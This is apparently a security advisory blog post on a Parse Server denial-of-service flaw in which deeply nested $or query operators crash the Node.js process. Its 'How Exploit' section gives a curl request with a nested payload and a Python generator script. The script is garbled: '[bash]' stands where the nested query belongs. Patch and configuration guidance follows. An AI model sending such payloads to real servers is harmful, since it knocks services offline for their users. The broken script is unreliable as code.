Listen to this Post
The vulnerability allows an unauthenticated attacker to crash the Parse Server process by sending a single, specially crafted request containing deeply nested query condition operators (like $and, $or, $nor). Parse Server did not impose any limits on the depth of nesting for these operators in incoming queries. When the server attempted to parse this infinitely or extremely deeply nested structure, it consumed excessive stack memory, leading to a stack overflow and an uncaught exception. This exception was not handled properly, causing the Node.js process to terminate abruptly. The termination results in a complete denial of service (DoS) for all connected clients until the server is manually restarted. The issue affects all Parse Server versions prior to 8.6.45 and versions 9.0.0 up to, but not including, 9.6.0-alpha.21. The patch introduces a new server configuration option, requestComplexity.queryDepth, which allows administrators to set a maximum allowed depth for query operators. This option is disabled by default to maintain backward compatibility, meaning users must explicitly enable it to protect their servers.
Platform: Parse Server
Version: <8.6.45, 9.0.0-9.5.x
Vulnerability : Deep Query DoS
Severity: High (8.7 CVSS)
date: 17 Mar 2026
Prediction: Patch already available
What Undercode Say:
Analytics:
The vulnerability is triggered by resource exhaustion through recursive parsing. An attacker does not need authentication. The crash is instantaneous upon request receipt. The fix introduces a configurable depth limit, shifting responsibility to the developer. This pattern is common in NoSQL databases and parsers.
How Exploit:
Example using curl to send a deeply nested $or query
This could cause a vulnerable Parse Server (e.g., v8.6.44) to crash.
curl -X POST http://your-parse-server.com:1337/parse/classes/YourClass \
-H "X-Parse-Application-Id: YOUR_APP_ID" \
-H "Content-Type: application/json" \
-d '{
"where": {
"$or": [
{
"$or": [
{
"$or": [
// ... repeat this nesting pattern thousands of times ...
{ "field": "value" }
]
}
]
}
]
}
}'
A proof-of-concept script to generate a deeply nested JSON object.
python3 << EOF
import json
def build_nested_query(depth):
query = {"field": "value"}
for _ in range(depth):
query = {"\$or": [bash]}
return {"where": query}
payload = build_nested_query(10000)
print(json.dumps(payload))
EOF
Protection from this CVE:
- Immediate Upgrade: Update Parse Server to version `8.6.45` or `9.6.0-alpha.21` (or later stable releases) .
- Enable Depth Limit: After upgrading, configure the `requestComplexity.queryDepth` option in your Parse Server configuration file (e.g., `index.js` or environment variables) .
// Example Parse Server initialization with queryDepth limit var api = new ParseServer({ databaseURI: 'mongodb://localhost:27017/dev', appId: 'YOUR_APP_ID', masterKey: 'YOUR_MASTER_KEY', serverURL: 'http://localhost:1337/parse', // Set the maximum allowed depth for query operators requestComplexity: { queryDepth: 50 // Adjust based on your app's needs } });
Impact:
Successful exploitation leads to an immediate crash of the Parse Server instance. This causes a complete denial of service for all applications and users relying on that server. All Parse operations (queries, logins, file uploads, Cloud Code functions) become unavailable until an administrator detects the outage and manually restarts the service. There is no data corruption or leak, only loss of availability .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

